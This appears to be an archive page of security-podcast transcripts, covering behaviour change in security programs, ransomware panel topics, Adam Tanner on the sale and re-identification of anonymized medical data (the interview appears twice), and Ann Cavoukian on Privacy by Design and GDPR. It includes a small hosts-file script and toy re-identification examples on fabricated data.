And the second thing is, I've sometimes seen that you can't change everything at once. Even if you've got a very ambitious program to overhaul security in your organization, you've gotta acknowledge that you can't shut down the company. The core business still has to run. That means you have a limited amount of attention, and people have a limited amount of time to deal with this. So phase things: you know, when you're changing, you change one or two bad habits first. Once they have bedded in, you then do the next couple, and so on. So it's a rolling, ongoing program that you run over a longer period of time.
Cindy Ng: Is there a priorities list?
Angela Sasse: There isn't a general blueprint. The organization has to develop that plan themselves based on their risk assessment and risk management plan. So they have to identify, you know, and say, "Here are the security mechanisms that we really need to work in order to mitigate a key risk." And clearly those are the behaviors that need to be transformed first.
Cindy Ng: Usually, it's being compliant or the regulators making sure that they're not in trouble with the... That's a huge driving force too.
Angela Sasse: Clearly. I mean, if otherwise you lose your license or you're not able to operate, it is very important to be compliant. But you should, you know...I always think it's very important that organizations make sure that their mechanism is working, as opposed to, you know, I basically can say, "I have a policy. This is what people are supposed to do," and then turn a blind eye to the fact that most of them, most of the time, aren't doing it.
This week, we continue our ongoing ransomware discussion with the Inside Out Security Show panel - Cindy Ng, Kilian Englert, Mike Buckbee, and Mike Thompson.
But before we launched into our conversation, as an icebreaker, I asked the panel what their advice would be to the tired sysadmin who deleted the wrong directory on the wrong server.
Buckbee: Do exactly what they did to fix the problem.
Englert: It happens, just have to recover and move on.
Thompson: Always take a snapshot before touching your production server.
Back to Ransomware
I likened this singular, life-changing malware to Emperor Palpatine. Why? The scammers try to be your friend and provide customer support. Meanwhile, they’re clever about extorting money from you.
There were a few interesting ransomware stories that we covered:
Inspired by this tweet, I asked the Inside Out Security Show panel – Cindy Ng, Kilian Englert, Mike Buckbee, and Alan Cizenski - if they could add an extra factor of authentication, what would it be?
Plus, we covered a few hot topics:
Tool for a Sysadmin
PsHosts: PowerShell cmdlet module for modifying the hosts file on Windows
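For readers who don't live in PowerShell, the edit a tool like PsHosts automates is simply adding or removing entries in the hosts file. A bare-bones, cross-platform Python sketch of the same idea follows; the hostname mapping is a made-up example, and writing the file requires administrator or root rights.

import platform

entry = "127.0.0.1    staging.example.internal"   # hypothetical mapping

hosts_path = (r"C:\Windows\System32\drivers\etc\hosts"
              if platform.system() == "Windows"
              else "/etc/hosts")

with open(hosts_path, "r+", encoding="utf-8") as f:
    existing = f.read().splitlines()
    if entry not in existing:
        f.write("\n" + entry + "\n")   # append the entry only if it is not already there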
Adam Tanner is the author of "Our Bodies, Our Data", which tells the story of a hidden dark market in drug prescription and other medical data. In recent years hackers have been able to steal health data on a massive scale -- remember Anthem? In this second part of our interview, we explore the implications of hacked medical data. If hackers get into a data broker's drug databases and combine them with previously stolen medical insurance records, will they rule the world?
Adam Tanner: Well, I'm glad to be with you.
IOS: We've also been writing about medical data privacy for our Inside Out Security blog. And we're familiar with how, for example, hospital discharge records can be legally sold to the private sector.
But in your new book, and this is a bit of a shock to me, you describe how pharmacies and others sell prescription drug records to data brokers. Can you tell us more about the story you've uncovered?
AT: Basically, throughout your journey as a patient into the healthcare system, information about you is sold. It has nothing to do with your direct treatment. It has to do with commercial businesses wanting to gain insight about you and your doctor, largely, for sales and marketing.
So, take the first step. You go to your doctor's office. The door is shut. You tell your doctor your intimate medical problems. The information that is entered into the doctor's electronic health system may be sold, commercially, as may the prescription that you pick up at the pharmacy or the blood tests that you take or the urine tests at the testing lab. The insurance company that pays for all of this or subsidizes part of this, may also sell the information.
That information about you is anonymized. That means that your information contains your medical condition, your date of birth, your doctor's name, your gender, all or part of your postal zip code, but it doesn't have your name on it.
All of that trade is allowed, under U.S. rules.
IOS: You mean under HIPAA?
AT: That's right. Now this may be surprising to many people who would ask this question, "How can this be legal under current rules?" Well, HIPAA says that if you take out the name and anonymize according to certain standards, it's no longer your data. You will no longer have any say over what happens to it. You don't have to consent to the trade of it. Outsiders can do whatever they want with that.
I think a lot of people would be surprised to learn that. Very few patients know about it. Even doctors and pharmacists and others who are in the system don't know that there's this multi-billion-dollar trade.
IOS: Right … we've written about the de-identification process, which seems like the right thing to do, in a way, because you're removing all the identifiers, and that includes zip code information and other geo information. It seems that for research purposes that would be okay. Do you agree with that, or not?
AT: So, these commercial companies, and some of the names may be well-known to us, companies such as IBM Watson Health, GE, LexisNexis, and the largest of them all may not be well-known to the general public, which is Quintiles and IMS. These companies have dossiers on hundreds of millions of patients worldwide. That means that they have medical information about you that extends over time, different procedures you've had done, different visits, different tests and so on, put together in a file that goes back for years.
Now, when you have that much information, even if it only has your date of birth, your doctor's name, your zip code, but not your name, not your Social Security number, not things like that, it's increasingly possible to identify people from that. Let me give you an example.
I'm talking to you now from Fairbanks, Alaska, where I'm teaching for a year at the university here. I lived, before that, in Boston, Massachusetts, and before that, in Belgrade, Serbia. I may be the only man of my age who meets that specific profile!
So, if you knew those three pieces of information about me and had medical information from those years, I might be identifiable, even in a haystack of millions of different other people.
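To make the re-identification risk he's describing concrete, here is a tiny, entirely fabricated Python illustration of matching an "anonymized" record back to a person using only quasi-identifiers; none of this data is real, and it is not drawn from the interview.

# An "anonymized" prescription record: no name, just quasi-identifiers
anonymized_record = {"birth_year": 1968, "zip3": "021", "doctor": "Dr. Jones"}

# Publicly knowable facts about a handful of people (all fabricated)
public_profiles = [
    {"name": "Alex Rivera", "birth_year": 1968, "zip3": "021", "doctor": "Dr. Jones"},
    {"name": "Sam Okafor",  "birth_year": 1975, "zip3": "100", "doctor": "Dr. Lee"},
]

quasi_identifiers = ("birth_year", "zip3", "doctor")
matches = [p["name"] for p in public_profiles
           if all(p[q] == anonymized_record[q] for q in quasi_identifiers)]

# If the combination of attributes is rare enough, the list contains exactly one name
print(matches)   # ['Alex Rivera']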
IOS: Yeah … we have written about that as well on the blog. We call these quasi-identifiers. They're not the traditional kind of identifiers, but they're other bits of information, as you pointed out, that can be used to sort of re-identify someone. Usually it's a small subset, but not always. And it would seem this information should also be protected in some way. So, do you think the laws are keeping up with this?
AT: HIPAA was written 20 years ago, and the HIPAA rules say that you can freely trade our patient information if it is anonymized to a certain standard. Now, the technology has gone forward, dramatically, since then.
So, the ability to store things very cheaply and the ability to scroll through them is much more sophisticated today than it was when those rules came into effect. For that reason, I think it's a worthwhile time to have a discussion now. Is this the best system? Is this what we want to do?
Interestingly, the system of the free trade in our patient information has evolved because commercial companies have decided this is what they'd want to do. There has not been an open public discussion of what is best for society, what is best for patients, what is best for science, and so on. This is just a system that evolved.
I'm saying, in writing this book, "Our Bodies, Our Data," that it is maybe worthwhile that we re-examine where we're at right now and say, "Do we want to have better privacy protection? Do we want to have a different system of contributing to science than we do now?"
IOS: I guess what also surprised me was that you say that pharmacies, for example, can sell the drug records, as long as it's anonymized. You would think that the drug companies would be against that. It's sort of leaking out their information to their competitors, in some way. In other words, information goes to the data brokers and then gets resold to the drug companies.
AT: Well, but you have to understand that everybody in what I call this big-data health bazaar is making money off of it. So, a large pharmacy chain, such as CVS or Walgreen's, they may make tens of millions of dollars in selling copies of these prescriptions to data miners.
Drug companies are particularly interested in buying this information because this information is doctor-identified. It says that Dr. Jones in Pittsburgh prescribes drug A almost all the time, rather than drug B. So, the company that makes drug B may send a sales rep to the doctor and say, "Doctor, here's some free samples. Let's go out to lunch. Let me tell you about how great drug B is."
So, this is because there exist these doctor profiles on individual doctors across the country that are used for sales and marketing, for a very sophisticated kind of targeting.
IOS: So, in an indirect way, the drug companies can learn about the other drug companies' sales patterns, and then say, "Oh, let me go in there and see if I can take that business away." Is that sort of the way it's working?
AT: In essence, yes. The origins of this trade date back to the 1950s. In its first form, these data companies, such as IMS Health, what they did was just telling companies what drugs sold in what market. Company A has 87% of the market. Their rival has 13% of the market. When medical information began to become digitized in the 1960s and '70s and evermore since then, there was a new opportunity to trade this data.
So, all of a sudden, insurance companies and middle-men connecting up these companies, and electronic health records providers and others, had a product that they could sell easily, without a lot of work, and data miners were eager to buy this and produce new products for mostly the pharmaceutical companies, but there are other buyers as well.
IOS: I wanted to get back to another point you mentioned, in that even with anonymized data records of medical records, with all the other information that's out there, you can re-identify or at least limit, perhaps, the pool of people who that data would apply to.
What's even more frightening now is that hackers have been stealing health records like crazy over the last couple of years. So, there's a whole dark market of hacked medical data that, I guess, if they got into this IMS database, they would have the keys to the kingdom, in a way.
Am I being too paranoid here?
AT: Well, no, you correctly point out that there has been a sharp upswing in hacking into medical records. That can happen into a small, individual practice, or it could happen into a large insurance company.
And in fact, the largest hacking attack of medical records in the last couple of years has been into Anthem Health, which is the Blue Cross Blue Shield company. Almost 80 million records were hacked in that.
So even people that did... I was hacked in that, even though I was not, at the time, a customer of them or had never been a customer of them, but they... One company that I dealt with outsourced to someone else, who outsourced to them. So, all of a sudden, this information can be in circulation.
There’s a government website people can look at, and you'll see, every day or two, there are new hackings. Sometimes it involves a few thousand names and an obscure local clinic. Sometimes it'll be a major company, such as a lab test company, and millions of names could be impacted.
So, this is something definitely to be concerned about. Yes, you could take these hacked records and match them with anonymized records to try to figure out who people are, but I should point out that there is no recorded instance of hackers getting into these anonymized dossiers by the big data miners.
IOS: Right. We hope so!
AT: I say recorded or acknowledged instance.
IOS: Right. Right. But there's now been sort of an awareness of cyber gangs and cyber terrorism and then the use of, let's say, records for blackmail purposes.
I don't want to get too paranoid here, but it seems like there's just a potential for just a lot of bad possibilities. Almost frightening possibilities with all this potential data out there.
AT: Well, we have heard recently about rumors of an alleged dossier involving Donald Trump and Russia.
IOS: Exactly.
AT: And information that... If you think about what kind of information could be most damaging or harmful to someone, it could be financial information. It could be sexual information, or it could be health information.
IOS: Yeah, or someone using... or has a prescription to a certain drug of some sort. I'm not suggesting anything, but that... All that information together could have sort of lots of implications, just, you know, political implications, let's say.
AT: I mean if you know that someone takes a drug that's commonly used for a mental health problem, that could be information used against someone. It could be used to deny them life insurance. It could be used to deny them a promotion or a job offer. It could be used by rivals in different ways to humiliate people. So, this medical information is quite powerful.
One person who has experienced this and spoken publicly about it is the actor, Charlie Sheen. He tested positive for HIV. Others somehow learned of it and blackmailed him. He said he paid millions of dollars to keep that information from going public, before he decided finally that he would stop paying it, and he'd have to tell the world about his medical condition.
IOS: Actually I was not aware of the payments he was making. That's just astonishing. So, is there any hope here? Do you see some remedies, through maybe regulations or enforcement of existing laws? Or perhaps we need new laws?
AT: As I mentioned, the current rules, HIPAA, allows for the free trade of your data if it's anonymized. Now, I think, given the growth of sophistication in computing, that we should change what the rule is and to define our medical data as any medical information about us, whether or not it's anonymized.
So, if a doctor is writing in the electronic health record, you should have a say as to whether or not that information is going to be used elsewhere.
A little side point I should mention. There are a lot of good scientists and researchers who want data to see if they can gain insights into disease and new medications. I think people should have the choice whether or not they want to contribute to those efforts.
So, you know, there's a lot of good efforts. There's a government effort under way now to gather a million DNA samples from people to make available to science. So, if people want to participate in that, and they think that's good work, they should definitely be encouraged to do so, but I think they should have the say and decide for themselves.
And so far, we don't really have that system. So, by redefining what patient data is, to say, "Medical information about a patient, whether or not it's anonymized," I think that would give us the power to do that.
IOS: So effectively, you're saying the patient owns the data, is the owner, and then would have to give consent for the data to be used. Is that about right?
AT: I think so. But on the other hand, as I mentioned, I've written this book to encourage this discussion. The problem we have right now is that the trade is so opaque.
Companies are extremely reluctant to talk about this commercial trade. So, they do occasionally say that, "Oh, this is great for science and for medicine, and all of these great things will happen." Well, if that is so fantastic, let's have this discussion where everyone will say, "All right. Here's how we use the data. Here's how we share it. Here's how we sell it."
Then let people in on it and decide whether they really want that system or not. But it's hard to have that intelligent policy discussion, what's best for the whole country, if industry has decided for itself how to proceed without involving others.
IOS: Well, I'm so glad you've written this book. This, I'm hoping, will promote the discussion that you're talking about. Well, this has been great. I want to thank you for the interview. So, by the way, where can our listeners reach out to you on social media? Do you have a handle on Twitter? Or Facebook?
AT: Well, I'm @datacurtain and I have a webpage, which is http://adamtanner.news/
IOS: Wonderful. Thank you very much, Adam.
While I thought we could ride on our recent successes for just a bit longer, attackers are back in full swing, filling my Twitter feed with the latest jaw-dropping security news.
As I waded in worry, I stumbled upon an interesting Benjamin Franklin quote, “Distrust and caution are the parents of security.”
Should distrust and caution be the parents of security? Who or what should the parents of security be?
I brought these questions to the Inside Out Security Show panelists – Cindy Ng, Kilian Englert, Mike Buckbee, and Forrest Temple.
Also, here are some of the stories we covered.
Sysadmin Tool: Nishang - PowerShell for penetration testing and offensive security.
With ransomware and data breaches driving headlines, it can feel like security pros are always one step behind. However, I recently found a few stories that I thought were worth celebrating.
Not everyone on the Inside Out Security Show panel – Cindy Ng, Mike Buckbee, Kilian Englert, and Kris Keyser – thought the stories were good news.
Nonetheless, I think that over time, as technologies mature, they do become more stable and secure. A few steps forward, a few steps back, right?
Here are some of the stories we covered. What do you think?
Sysadmin Tool: How to set up a SPF record to prevent spam and spear phishing
Adam Tanner is the author of "Our Bodies, Our Data", which tells the story of a hidden dark market in prescription drug and other medical data. Adam explains how the sale of "anonymized" data is a multi-billion-dollar business not covered by HIPAA rules. In this first part of our interview, we learn from Adam how the medical data brokers got started and why it's legal.
Adam Tanner: Well, I'm glad to be with you.
IOS: We've also been writing about medical data privacy for our Inside Out Security blog. And we're familiar with how, for example, hospital discharge records can be legally sold to the private sector.
But in your new book, and this is a bit of a shock to me, you describe how pharmacies and others sell prescription drug records to data brokers. Can you tell us more about the story you've uncovered?
AT: Basically, throughout your journey as a patient into the healthcare system, information about you is sold. It has nothing to do with your direct treatment. It has to do with commercial businesses wanting to gain insight about you and your doctor, largely, for sales and marketing.
So, take the first step. You go to your doctor's office. The door is shut. You tell your doctor your intimate medical problems. The information that is entered into the doctor's electronic health system may be sold, commercially, as may the prescription that you pick up at the pharmacy or the blood tests that you take or the urine tests at the testing lab. The insurance company that pays for all of this or subsidizes part of this, may also sell the information.
That information about you is anonymized. That means that your information contains your medical condition, your date of birth, your doctor's name, your gender, all or part of your postal zip code, but it doesn't have your name on it.
All of that trade is allowed, under U.S. rules.
IOS: You mean under HIPAA?
AT: That's right. Now this may be surprising to many people who would ask this question, "How can this be legal under current rules?" Well, HIPAA says that if you take out the name and anonymize according to certain standards, it's no longer your data. You will no longer have any say over what happens to it. You don't have to consent to the trade of it. Outsiders can do whatever they want with that.
I think a lot of people would be surprised to learn that. Very few patients know about it. Even doctors and pharmacists and others who are in the system don't know that there's this multi-billion-dollar trade.
IOS: Right … we've written about the de-identification process, which seems like the right thing to do, in a way, because you're removing all the identifiers, and that includes zip code information and other geo information. It seems that for research purposes that would be okay. Do you agree with that, or not?
AT: So, these commercial companies, and some of the names may be well-known to us, companies such as IBM Watson Health, GE, LexisNexis, and the largest of them all, Quintiles and IMS, may not be well-known to the general public. These companies have dossiers on hundreds of millions of patients worldwide. That means that they have medical information about you that extends over time, different procedures you've had done, different visits, different tests and so on, put together in a file that goes back for years.
Now, when you have that much information, even if it only has your date of birth, your doctor's name, your zip code, but not your name, not your Social Security number, not things like that, it's increasingly possible to identify people from that. Let me give you an example.
I'm talking to you now from Fairbanks, Alaska, where I'm teaching for a year at the university here. I lived, before that, in Boston, Massachusetts, and before that, in Belgrade, Serbia. I may be the only man of my age who meets that specific profile!
So, if you knew those three pieces of information about me and had medical information from those years, I might be identifiable, even in a haystack of millions of different other people.
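To see how little it takes, here is a minimal sketch of the kind of quasi-identifier filtering Adam is describing. The record fields and sample data below are hypothetical, invented only to illustrate the idea; they are not drawn from any real broker file.

```typescript
// Minimal sketch: how a few quasi-identifiers can single someone out of an
// "anonymized" dataset. All fields and records here are hypothetical.
interface AnonymizedRecord {
  birthYear: number;   // no name, no Social Security number...
  zip3: string;        // first three digits of the postal code
  doctor: string;      // prescriber name, as in the data-broker files
  diagnosis: string;
}

const dataset: AnonymizedRecord[] = [
  { birthYear: 1964, zip3: "997", doctor: "Dr. Smith", diagnosis: "hypertension" },
  { birthYear: 1964, zip3: "021", doctor: "Dr. Jones", diagnosis: "asthma" },
  { birthYear: 1980, zip3: "997", doctor: "Dr. Smith", diagnosis: "diabetes" },
  // ...millions more records in a real dossier
];

// Outside knowledge about a target: rough age plus the places they have lived.
const candidates = dataset.filter(
  (r) => r.birthYear === 1964 && ["997", "021"].includes(r.zip3)
);

// If the filter leaves exactly one record, the "anonymous" row is effectively
// re-identified, and the diagnosis attaches to a named person.
console.log(`Candidates remaining: ${candidates.length}`);
```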
IOS: Yeah …We have written about that as well in the blog. We call these quasi-identifiers. They're not the traditional kind of identifiers, but they're other bits of information, as you pointed out, that can be used to sort of re-identify. Usually it's a small subset, but not always. And that this information would seem also should be protected as well in some way. So, do you think that the laws are keeping up with this?
AT: HIPAA was written 20 years ago, and the HIPAA rules say that you can freely trade our patient information if it is anonymized to a certain standard. Now, the technology has gone forward, dramatically, since then.
So, the ability to store things very cheaply and the ability to scroll through them is much more sophisticated today than it was when those rules came into effect. For that reason, I think it's a worthwhile time to have a discussion now. Is this the best system? Is this what we want to do?
Interestingly, the system of the free trade in our patient information has evolved because commercial companies have decided this is what they'd want to do. There has not been an open public discussion of what is best for society, what is best for patients, what is best for science, and so on. This is just a system that evolved.
I'm saying, in writing this book, "Our Bodies, Our Data," that it is maybe worthwhile that we re-examine where we're at right now and say, "Do we want to have better privacy protection? Do we want to have a different system of contributing to science than we do now?"
IOS: I guess what also surprised me was that you say that pharmacies, for example, can sell the drug records, as long as it's anonymized. You would think that the drug companies would be against that. It's sort of leaking out their information to their competitors, in some way. In other words, information goes to the data brokers and then gets resold to the drug companies.
AT: Well, but you have to understand that everybody in what I call this big-data health bazaar is making money off of it. So, a large pharmacy chain, such as CVS or Walgreen's, they may make tens of millions of dollars in selling copies of these prescriptions to data miners.
Drug companies are particularly interested in buying this information because this information is doctor-identified. It says that Dr. Jones in Pittsburgh prescribes drug A almost all the time, rather than drug B. So, the company that makes drug B may send a sales rep to the doctor and say, "Doctor, here's some free samples. Let's go out to lunch. Let me tell you about how great drug B is."
So, this is because there exist these profiles on individual doctors across the country, that are used for sales and marketing, for a very sophisticated kind of targeting.
IOS: So, in an indirect way, the drug companies can learn about the other drug companies' sales patterns, and then say, "Oh, let me go in there and see if I can take that business away." Is that sort of the way it's working?
AT: In essence, yes. The origins of this trade date back to the 1950s. In its first form, these data companies, such as IMS Health, what they did was just telling companies what drugs sold in what market. Company A has 87% of the market. Their rival has 13% of the market. When medical information began to become digitized in the 1960s and '70s and evermore since then, there was a new opportunity to trade this data.
So, all of a sudden, insurance companies and middle-men connecting up these companies, and electronic health records providers and others, had a product that they could sell easily, without a lot of work, and data miners were eager to buy this and produce new products for mostly the pharmaceutical companies, but there are other buyers as well.
IOS: I wanted to get back to another point you mentioned, in that even with anonymized data records of medical records, with all the other information that's out there, you can re-identify or at least limit, perhaps, the pool of people who that data would apply to.
What's even more frightening now is that hackers have been stealing health records like crazy over the last couple of years. So, there's a whole dark market of hacked medical data that, I guess, if they got into this IMS database, they would have the keys to the kingdom, in a way.
Am I being too paranoid here?
AT: Well, no, you correctly point out that there has been a sharp upswing in hacking into medical records. That can happen into a small, individual practice, or it could happen into a large insurance company.
And in fact, the largest hacking attack of medical records in the last couple of years has been into Anthem Health, which is the Blue Cross Blue Shield company. Almost 80 million records were hacked in that.
So even people that didn't deal with them directly were affected. I was hacked in that, even though I was not, at the time, a customer of theirs and had never been a customer of theirs. One company that I dealt with outsourced to someone else, who outsourced to them. So, all of a sudden, this information can be in circulation.
There’s a government website people can look at, and you'll see, every day or two, there are new hackings. Sometimes it involves a few thousand names and an obscure local clinic. Sometimes it'll be a major company, such as a lab test company, and millions of names could be impacted.
So, this is something definitely to be concerned about. Yes, you could take these hacked records and match them with anonymized records to try to figure out who people are, but I should point out that there is no recorded instance of hackers getting into these anonymized dossiers by the big data miners.
IOS: Right. We hope so!
We continue our discussion with Dr. Ann Cavoukian. She is currently Executive Director of Ryerson University’s Privacy and Big Data Institute and is best known for her leadership in the development of Privacy by Design (PbD).
In this segment, Cavoukian tells us that once you’ve involved your customers in the decision making process, “You won’t believe the buy-in you will get under those conditions because then you’ve established trust and that you’re serious about their privacy.”
We also made time to cover General Data Protection Regulation (GDPR) as well as three things organizations can do to demonstrate that they are serious about privacy.
Learn more about Dr. Cavoukian:
Dr. Cavoukian: I think one of the things businesses don't do very well is involve their customers in the decisions that they make, and I'll give you an example. Years ago I read something called "Permission Based Marketing" by Seth Godin, and he's amazing. And I read it, and I thought, "Oh this guy must have a privacy background," because it was all about enlisting the support of your customers, gaining their permission and getting them to, as Godin said, "Put their hand up and say 'count me in.'" So I called him, he was based in California at the time, and I said, "Oh Mr. Godin, you must have a privacy background?" And he said something like, "No, lady, I'm a marketer through and through, but I can see the writing on the wall. We've gotta engage customers, get them involved, get them to wanna participate in the things we're doing."
So, I always tell businesses that are serious about privacy, "First of all, don't be quiet about it. Shout it from the rooftops, the lengths you're going to, to protect your customer's privacy. How much you respect it, how user-centric your programs are, and you're focused on their needs in delivering." And, then, once they understand this is the background you're bringing, and you have great respect for privacy, in that context you say, "We would like you to consider giving us permission to allow it for these additional secondary uses. Here's how we think it might benefit you, but we won't do it without your positive consent." You wouldn't believe the buy-in you will get under those conditions because then you have established a trusted business relationship. They can see that you're serious about privacy, and then they say, "Well by all means, if this will help me, in some way, use my information for this additional purpose." You've gotta engage the customers in an active dialog.
Cindy Ng: So ask, and you might receive.
Dr. Cavoukian: Definitely, and you will most likely receive.
Cindy Ng: In sales processes they're implementing that as well, "Is it okay if I continue to call you, or when can I call you next?" So they're constantly feeling they're engaged and part of the process, and it's so effective.
Dr. Cavoukian: And I love that. Myself, as a customer... I belong to this air miles program, and I love it, because they don't do anything without my positive consent. And, yet, I benefit because they send me targeted ads and things I'm interested in. And I'm happy to do that, and then I get more points and then it just continues to be a win-win.
Cindy Ng: Did you write anything about user access controls? What are your thoughts on that?
Dr. Cavoukian: We wrote about it in the context of that you've gotta have restricted access to those who have... I was gonna say, "Right to know." Meaning there is some business purpose for which they're accessing the data. And that can be...when I say, "business purpose," I mean that broadly, in a hospital. People who are taking care of a patient, in whatever context, it can be in the lab. They go there for testing. Then they go for an MRI, and then they go... So there could be a number of different arms that have legitimate access to the data, because they've gotta process it in a variety of different ways. That's all legitimate, but those people who aren't taking care of the patient, in some broad manner, should have their access to the data completely restricted. Because that's when the snooping and the rogue employee...
Cindy Ng: Curiosity.
Dr. Cavoukian: ...picture, the curiosity, takes you away, and it completely distorts the entire process in terms of the legitimacy of those people who should have access to it, especially in a hospital context, or patient context. You wanna enable easy access for those who have a right to know because they're treating patients. And then the walls should go up for those who are not treating in any manner. It'd be difficult to do, but it is eminently doable, and you have to do it because that's what patients expect. Patients have no idea that someone might be just, out of curiosity, looking at their file. You've had a breast removed, you had... I mean horrible things happen.
Cindy Ng: Tell us about GDPR and its implications for Privacy by Design.
Dr. Cavoukian: For the first time, right now the EU has the General Data Protection Regulation, which passed for the first time ever. It has the words, the actual words, "Privacy by Design" and "Privacy as the default," in the statute.
Cindy Ng: That's great.
Dr. Cavoukian: It's a first, it's really huge, but what that means is it will strengthen those laws far beyond the U.S. laws. We talked about privacy as the default. It's the model of positive consent. It's not just looking for the opt-out box. It's gonna really raise the bar, and that might present some problems in dealing with laws in the States.
Cindy Ng: Then there's also the right to be forgotten, and we live in such a globalized world, with people doing business both in the States and in Europe, that it's been complicated.
Dr. Cavoukian: It does get very complicated. What I tell people everywhere that I go to speak is that if you follow the principles of Privacy by Design, which in itself raised the bar dramatically from most legislation, you will virtually be assured of complying with your regulations, whatever jurisdiction you're in. Because you're following the highest level of protection. So that's another attractive feature about Privacy by Design is it offers such a high level of protection that you're virtually assured of regulatory compliance, whatever jurisdiction you're in.
And in the U.S., I should say, that the FTC, the Federal Trade Commission, a number of years ago, under Jon Leibowitz, when he was Chair, they made Privacy by Design the first of three best practices that the FTC recommended. And since he's left, and Chairwoman Edith Ramirez is the Chair, she has also followed Privacy by Design and Security by Design, which are absolutely, interchangeably critical, and they are holding this high bar. So, I urge companies always to follow this to the extent that they can, because it will elevate their standing, both with the regulatory bodies, like the FTC, and with commissioners, and jurisdictions, and the EU, and Australia, and South America, South Africa. There's something called GPN, the Global Privacy Network, and a lot of the people who participate in these follow these discussions.
Cindy Ng: What are three things that organizations can do in terms of protecting their consumers' privacy?
Dr. Cavoukian: So, when I go to a company, I speak to the board of directors, their CEO, and their senior executive. And I give them this messaging about, "You've gotta be inclusive. You have to have a holistic approach to protecting privacy in your company, and it's gotta be top down." If you give the messaging to your frontline folks that you care deeply about your customer's privacy, you want them to take it seriously, that message will emanate. And, then what happens from there, the more specific messaging is, what you say to people, is you wanna make sure that customers understand their privacy is highly respected by this company. "We go to great lengths to protect your privacy." You wanna communicate that to them, and then you have to follow up on it. Meaning, "We use your information for the purpose intended that we tell you we're gonna use it for. We collect it for that purpose. We use it for that purpose." And then, "Privacy is the default setting. We won't use it for anything else without your positive consent after that, for secondary uses."
So that's the first thing I would do. Second thing I would do is I would have at least quarterly meetings with staff. You need to reinforce this message. It's gotta be spread across the entire organization. It can't just be the chief privacy officer who's communicating this to a few people. You gotta get everyone to buy into this, because you... I was gonna say the lowest. I don't mean low in terms of category, but the frontline clerk might be low on the totem pole, but they may have the greatest power to breach privacy. So they have to understand, just like the highest senior manager has to understand, how important privacy is and why and how you can protect it. So have these quarterly meetings with your staff. Drive the message home, and it can be as simple as them understanding that this is... You're gonna get what I call, "privacy payoff." By protecting your customer's privacy, it's gonna yield big returns for your company. It will increase customer confidence and enhance customer trust, and that will increase our bottom line.
And the third thing, I know this is gonna sound a little pompous, but I would invite a speaker in, and only because this has happened to me, I've been invited in to speak to a company, like, once a year. And you invite everybody, from top to bottom. You open it up and... People need to have these ideas reinforced. It has to be made real. "Is this really a problem?" So, you bring in a speaker. I'm using myself as an example because I've done it, but it can be anybody who can speak to what happens when you don't protect your customer's privacy. It really helps for people inside a company, especially those doing a good job, to understand what can happen when you don't do it right and what the consequences are to both the company and to employees. They're huge. You can lose your jobs. The company could go under. You could be facing class action lawsuits.
And I find that it's not all a bad news story. I give the bad news, what's happening out there and what can happen, and then I applaud the behavior of the companies. And what they get is this dual message of, "Oh my God, this is real. This has real consequences when we fail to protect customer's privacy, but look at the gains we have, look at the payoff in doing so." And it makes them feel really good about themselves and the job that they're doing, and it underscores the importance of protecting customer's privacy.
Next month, the world will be talking security at the annual RSA Conference, which will be held in San Francisco from February 13th to the 17th. When it comes to discussing security matters, experts often tell us to take stock of our risks or to complete a risk assessment. However, perhaps before understanding where we might be vulnerable, it might be more important to consider exactly what threats we’re really faced with.
In this episode of the Inside Out Security Show, I asked our panelists – Cindy Ng, Mike Thompson, Kilian Englert, and Mike Buckbee – about four #realthreats: disgruntled employees, passwords on sticky notes, hijacked accounts, and ransomware.
I recently had the chance to speak with former Ontario Information and Privacy Commissioner Dr. Ann Cavoukian about big data and privacy. Dr. Cavoukian is currently Executive Director of Ryerson University’s Privacy and Big Data Institute and is best known for her leadership in the development of Privacy by Design (PbD).
What’s more, she came up with PbD language that made its way into the GDPR, which will go into effect in 2018. First developed in the 1990s, PbD addresses the growing privacy concerns brought upon by big data and IoT devices.
Many worry that PbD interferes with innovation and business, but that’s not the case.
When working with government agencies and organizations, Dr. Cavoukian’s singular approach is that big data and privacy can operate together seamlessly. At the core, her message is this: you can simultaneously collect data and protect customer privacy.
Cindy Ng
With Privacy by Design principles codified in the new General Data Protection Regulation, which will go into effect in 2018, it might help to understand the intent and origins of it. And that's why I called former Ontario Information and Privacy Commissioner, Dr. Ann Cavoukian. She is currently Executive Director of Ryerson University's Privacy and Big Data Institute and is best known for her leadership in the development of Privacy by Design. When working with government agencies and organizations, Dr. Cavoukian's singular approach is that big data and privacy can operate together seamlessly. At the core, her message is this, you can simultaneously collect data and protect customer privacy.
Thank you, Dr. Cavoukian, for joining us today. I was wondering, as Information and Privacy Commissioner of Ontario, what did you see was effective when convincing organizations and government agencies to treat people's private data carefully?
Dr. Cavoukian
The approach I took...I always think that the carrot is better than the stick, and I did have order-making power as Commissioner. So I had the authority to order government organizations, for example, who were in breach of the Privacy Act to do something, to change what they were doing and tell them what to do. But the problem...whenever you have to order someone to do something, they will do it because they are required to by law, but they're not gonna be happy about it, and it is unlikely to change their behavior after that particular change that you've ordered. So, I always led with the carrot in terms of meeting with them, trying to explain why it was in both their best interest, in citizens' best interest, in customers' best interest, when I'm talking to businesses. Why it's very, very important to make it...I always talk about positive sum, not zero sum, make it a win-win proposition. It's gotta be a win for both the organization who's doing the data collection and the data use and the customers or citizens that they're serving. It's gotta be a win for both parties, and when you can present it that way, it gives you a seat at the table every time. And let me explain what I mean by that. Many years ago I was asked to join the board of the European Biometrics Forum, and I was honored, of course, but I was surprised because in Europe they have more privacy commissioners than anywhere else in the world. Hundreds of them, they're brilliant. They're wonderful, and I said, "Why are you coming to me as opposed to one of your own?" And they said, "It's simple." They said, "You don't say 'no' to biometrics. You say 'yes' to biometrics, and 'Here are the privacy protective measures that I insist you put on them.'" They said, "We may not like how much you want us to do, but we can try to accommodate that. But what we can't accommodate is if someone says, 'We don't like your industry.'" You know, basically to say "no" to the entire industry is untenable. So, when you go in with an "and" instead of a "versus," it's not me versus your interests. It's my interests in privacy and your interests in the business or the government, whatever you're doing. So, zero sum paradigms are one interest versus another. You can only have security at the expense of privacy, for example. In my world, that doesn't cut it.
Cindy Ng
Dr. Cavoukian, can you tell us a little bit more about Privacy by Design?
Dr. Cavoukian
I really crystallized Privacy by Design really after 9/11, because at 9/11 it became crystal clear that everybody was talking about the vital need for public safety and security, of course. But it was always construed as at the expense of privacy, so if you have to give up your privacy, so be it. Public safety's more important. Well, of course public safety is extremely important, and we did a position piece at that point for our national newspaper, "The Globe and Mail," and the position I took was public safety is paramount with privacy embedded into the process. You have to have both. There's no point in just having public safety without privacy. Privacy forms the basis of our freedoms. You wanna live in free democratic society, you have to be able to have moments of reserve and reflection and intimacy and solitude. You have to be able to do that.
Cindy Ng
